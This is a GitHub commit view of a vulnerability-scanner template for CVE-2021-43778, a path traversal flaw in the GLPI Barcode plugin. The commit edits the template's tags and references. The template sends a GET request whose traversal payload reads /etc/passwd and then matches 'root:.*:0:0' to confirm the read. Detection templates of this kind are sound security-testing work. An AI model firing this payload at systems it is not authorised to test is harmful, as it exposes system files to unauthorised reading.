Update CVE-2021-43778.yaml

patch-1
Prince Chaddha 2021-12-01 19:19:10 +05:30 committed by GitHub
parent 2a8ca5d836
commit 93f9f3ccac
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 4 additions and 5 deletions

View File

@ -6,26 +6,25 @@ info:
severity: critical
description: Barcode is a GLPI plugin for printing barcodes and QR codes. GLPI instances version 2.x prior to version 2.6.1 with the barcode plugin installed are vulnerable to a path traversal vulnerability. This issue was patched in version 2.6.1. As a workaround, delete the `front/send.php` file..
reference:
- https://github.com/AK-blank/CVE-2021-43778
- https://nvd.nist.gov/vuln/detail/CVE-2021-43778
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
cvss-score: 9.1
cve-id: CVE-2021-43778
tags: GLPI, Barcode
tags: glpi,cve,cve2021,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/glpi/plugins/barcode/front/send.php?file=../../../../../../../../etc/passwd"
headers:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5)
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
name: LFI
regex:
- "root:.*:0:0"
- "root:.*:0:0"